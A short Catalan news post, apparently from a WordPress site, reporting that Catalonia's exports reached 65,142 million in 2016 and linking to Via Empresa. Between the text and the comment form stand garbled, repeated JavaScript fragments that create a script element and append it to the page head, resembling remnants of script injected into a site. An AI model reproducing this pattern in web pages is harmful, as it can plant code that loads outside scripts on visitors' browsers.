Notícies

Mobile o com albirà el futur

Aquesta setmana s’ha fet públic que Catalunya va tancar 2016 amb un volum d’exportacions que arribà als 65.142 milions, un 2% més que el 2015, o el que és el mateix el 25,6% de les exportacions del total de l’Estat. Un creixement de les exportacions ampli quant a sectors entre els quals destaquen el de béns d’equip, la química o l’automòbil; i també quant a mercats com es constata amb un increment de les exportacions molt superior al creixement de la zona euro (0,7%) o al d’Alemanya (1,2%), un nou record que evidencia la capacitat industrial del país que ha assumit els reptes de competitivitat i globalització exportant productes de qualitat i alt valor afegit, tot assumint els conceptes propis de la digitalització.

Seguir llegint a Via Empresa

d.getElementsByTagName(‘head’)[0].appendChild(s);

var d=document;var s=d.createElement(‘script’); d.getElementsByTagName(‘head’)[0].appendChild(s);var d=document;var s=d.createElement(‘script’);

Deixa un comentari

L'adreça electrònica no es publicarà Els camps necessaris estan marcats amb *

Podeu fer servir aquestes etiquetes i atributs HTML: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>